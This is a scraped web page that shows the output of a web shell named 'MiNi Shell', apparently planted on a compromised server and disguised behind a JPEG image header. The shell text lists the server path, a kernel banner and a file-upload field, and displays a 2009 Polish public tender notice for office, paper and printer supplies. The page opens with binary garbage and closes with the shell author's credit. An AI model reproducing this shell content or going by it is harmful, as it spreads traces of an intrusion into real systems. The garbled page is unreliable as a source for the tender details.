JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/94704-N-2009.html

<p class="kh_header"><b>Zielonka: DOSTAWA MATERIAŁÓW PAPIERNICZO-BIUROWYCH 
I EKSPLOATACYJNYCH</b><br>
<b>Numer ogłoszenia: 94704 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowy Instytut Techniczny Uzbrojenia , ul. Prymasa S. Wyszyńskiego 7, 05-220 Zielonka, woj. mazowieckie, tel. 022 7614425, faks 022 7614446.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.witu.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jbr.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW PAPIERNICZO-BIUROWYCH 
I EKSPLOATACYJNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje dostawę do siedziby zamawiającego materiałów papierniczo-biurowych oraz materiałów eksploatacyjnych wg formularza cenowego. Wymienione w formularzu cenowym materiały muszą być wysokiej jakości i o wysokich walorach użytkowych. Cały asortyment stanowiący przedmiot zamówienia musi być fabrycznie nowy. Materiały eksploatacyjne nie mogą pochodzić z recyklingu, muszą być dostarczone w oryginalnych opakowaniach producenta i zabezpieczone przez producenta gwarancją naklejoną na złączu opakowania - uniemożliwiającą nieniszczące otwarcie tegoż opakowania. Dostarczone artykuły muszą posiadać termin ważności minimum 1 rok od daty ich dostarczenia do siedziby zamawiającego, spełniać wymagania określone w Polskich Normach, posiadać świadectwa jakości, aprobaty oraz atesty.
2.Dostarczone materiały eksploatacyjne nie mogą naruszać warunków gwarancji urządzeń do których są przeznaczone.
3.Ilości poszczególnego asortymentu, szczegółowe wymagania techniczne oraz in-formacje uzupełniające dotyczące przedmiotu zamówienia określono w formularzu cenowym.
Wszędzie tam, gdzie w materiałach przetargowych użyto przy określaniu przedmiotu zamówienia znaków towarowych lub miejsca pochodzenia, dopuszcza się składanie ofert z asortymentem równoważnym o jakości nie niższej niż wymieniony w SIWZ.
Dodatkowe postanowienia dotyczące przedmiotu zamówienia 
4 Przedmiot zamówienia będzie podlegał:
a)odbiorowi rzeczowo-ilościowemu po dostawie do magazynu WITU.
5 Przedmiot zamówienia został podzielony na trzy części. Zamawiający dopuszcza złożenie oferty częściowej na jedną lub więcej wymienionych części (wyodrębnio-nych w formularzu cenowym) przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy będący osobami fizycznymi, osobami prawnymi lub jednostkami organizacyjnymi nie posiadającymi osobowości prawnej a także wykonawcy występujący wspólnie. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.
2.W postępowaniu o udzielenie zamówienia mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:
-Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - prowadzą działalność obejmującą przedmiot zamówienia;
-Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem tech-nicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
-Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie za-mówienia;
-Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
ponadto:
-Udzielą co najmniej jednorocznej gwarancji jakości na cały oferowany przedmiot zamówienia;
-Akceptują warunki zawarte w niniejszej SIWZ i w Istotnych postanowieniach 
umowy.
Z postępowania wykluczeni zostaną wykonawcy, którzy nie spełniają wymagań określonych w art. 24 ust 1 i 2 ustawy Prawo zamówień publicznych. 
O wykluczeniu z postępowania o udzielenie zamówienia wykonawcy zostaną nie-zwłocznie zawiadomieni.
Oferta wykonawcy wykluczonego uznana zostanie za odrzuconą.
Zamawiający odrzuci ofertę, (art. 89 ustawy Pzp.) jeżeli:
-Jest niezgodna z ustawą.
-Jej treść nie odpowiada treści Specyfikacji Istotnych Warunków Zamówienia, z za-strzeżeniem art. 87 ust. 2 pkt 3.
-Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwal-czaniu nieuczciwej konkurencji.
-Zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.
-Została złożona przez wykonawcę wykluczonego z udziału w postępowaniu 
o udzielenie zamówienia.
-Zawiera błędy w obliczeniu ceny. 
-Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3.
-Jest nieważna na podstawie odrębnych przepisów.
O odrzuceniu oferty zawiadomieni zostaną równocześnie wszyscy wykonawcy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty i załączniki:
-Formularz ofertowy (oferta).
-Formularz cenowy.
-Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie pu-bliczne z art. 22 ust 1 ustawy Prawo zamówień publicznych.
-Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania z art. 24 ust 1 i 2 Prawa zamówień publicznych.
-Parafowane przez wykonawcę Istotne postanowienia umowy.
W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określo-nej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu, do oferty należy dołączyć następujące dokumenty:
-Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewi-dencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę oraz doświadcze-nie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamó-wienia, do oferty należy dołączyć:
-Wykaz wykonanych w okresie ostatnich trzech lat dostaw, a jeżeli okres prowa-dzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przed-miotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że dostawy te zostały wykonane należycie;
-Pisemne zobowiązanie podmiotu trzeciego w przypadku udostępnienia wykonawcy zamówienia potencjału technicznego lub osób.
W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finan-sowej zapewniającej wykonanie zamówienia, do oferty należy dołączyć:
-Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków fi-nansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składania ofert.
-Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Ponadto do oferty wykonawca dołączy następujące oświadczenia lub dokumenty:
-Oświadczenie, że wszystkie dostarczone materiały będą fabrycznie nowe, o wyso-kiej jakości i o wysokich walorach użytkowych.
-Oświadczenie, że przy dostawie przedmiotu zamówienia wykonawca dostarczy na oferowane materiały świadectwa jakości i zgodności, (certyfikaty, atesty, aprobaty).
-Oświadczenie, że akceptuje warunki zawarte w niniejszej SIWZ i w Istotnych po-stanowieniach umowy.
Brak jakiegokolwiek z ww. dokumentów lub złożenie ich w niewłaściwej formie, pomimo wezwania do uzupełnienia może spowodować odrzucenie oferty.
Postanowienia dotyczące składanych dokumentów.
-Oferta winna zawierać wszystkie wymagane dokumenty, oświadczenia 
i załączniki.
-Wymienione dokumenty powinny być złożone wyłącznie w formie określonej rozpo-rządzeniem Prezesa Rady Ministrów w sprawie rodzajów dokumentów potwierdza-jących spełnienie warunków udziału w postępowaniu o udzielenie zamówienia pu-blicznego, jakich może żądać Zamawiający od wykonawcy.
Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne):
-Wraz z ofertą winna być przedłożona kopia umowy, porozumienie lub inny doku-ment regulujący współpracę podmiotów występujących wspólnie, potwierdzający zawarcie konsorcjum/spółki cywilnej, podpisane przez wszystkich partnerów, przy czym termin, na jaki zostało zawarte konsorcjum nie może być krótszy niż termin realizacji zamówienia.
-Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia lub do reprezentowania w postępowaniu i zawarcia umo-wy, a pełnomocnictwo (upoważnienie) do pełnienia takiej funkcji wystawione zgod-nie z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów winno być dołączone do oferty.
-Oferta winna być podpisana przez każdego partnera lub ustanowionego pełno-mocnika.
-Oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienio-ne, w punktach 7.1 do 7.5 dla każdego partnera z osobna, pozostałe składane są wspólnie.
Postanowienia w sprawie dokumentów zastrzeżonych:
-Wszystkie dokumenty złożone przez wykonawcę są jawne z wyjątkiem informacji zastrzeżonych, które to należy wyszczególnić na druku formularza ofertowego 
w pozycji Dokumenty zastrzeżone.
-Dokumenty złożone w prowadzonym postępowaniu są jawne z wyjątkiem nie pod-legających ujawnieniu oraz informacji zastrzeżonych przez składającego
ofertę.
-Wykonawca nie może zastrzec informacji i dokumentów, których jawność wynika 
z innych aktów prawnych (Art. 8 ust. 3 ustawy Prawo zamówień publicznych)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji udzielony na przedmiot zamówienia - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.witu.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowy Instytut Techniczny Uzbrojenia 
05-220 Zielonka
 ul. Prym. Stefana Wyszyńskiego 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 10:00, miejsce: Siedziba Zamawiającego - Kancelaria ogólna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów biurowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę do siedziby zamawiającego materiałów biurowych wg formularza cenowego. Wymienione w formularzu cenowym materiały muszą być wysokiej jakości i o wysokich walorach użytkowych. Cały asortyment stanowiący przedmiot zamówienia musi być fabrycznie nowy. Dostarczone artykuły muszą posiadać termin ważności minimum 1 rok od daty ich dostarczenia do siedziby zamawiającego, spełniać wymagania określone w Polskich Normach, posiadać świadectwa jakości, aprobaty oraz atesty.
Ilości poszczególnego asortymentu, szczegółowe wymagania techniczne oraz in-formacje uzupełniające dotyczące przedmiotu zamówienia określono w formularzu cenowym..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji udzielony na przedmiot zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów papierniczych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę do siedziby zamawiającego materiałów papierniczych wg formularza cenowego. Wymienione w formularzu cenowym materiały muszą być wysokiej jakości i o wysokich walorach użytkowych. Cały asor-tyment stanowiący przedmiot zamówienia musi być fabrycznie nowy. Ilości poszczególnego asortymentu, szczegółowe wymagania techniczne oraz informacje uzupełniające dotyczące przedmiotu zamówienia określono w formularzu cenowym..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji udzielony na przedmiot zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów eksploatacyjnych do drukarek i komputerów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę do siedziby zamawiającego materiałów eksploatacyjnych wg formularza cenowego. Wymienione w formularzu cenowym materiały muszą być wysokiej jakości i o wysokich walorach użytkowych. Cały asor-tyment stanowiący przedmiot zamówienia musi być fabrycznie nowy. Materiały eksploatacyjne nie mogą pochodzić z recyklingu, muszą być dostarczone w oryginalnych opakowaniach producenta i zabezpieczone przez producenta gwarancją naklejoną na złączu opakowania - uniemożliwiającą nieniszczące otwarcie tegoż opakowania. Dostarczone artykuły muszą posiadać termin ważności minimum 1 rok od daty ich dostarczenia do siedziby zamawiającego, spełniać wymagania określone w Polskich Normach, posiadać świadectwa jakości, aprobaty oraz atesty.
3Dostarczone materiały eksploatacyjne nie mogą naruszać warunków gwarancji urządzeń do których są przeznaczone.
Ilości poszczególnego asortymentu, szczegółowe wymagania techniczne oraz in-formacje uzupełniające dotyczące przedmiotu zamówienia określono w formularzu cenowym..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji udzielony na przedmiot zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com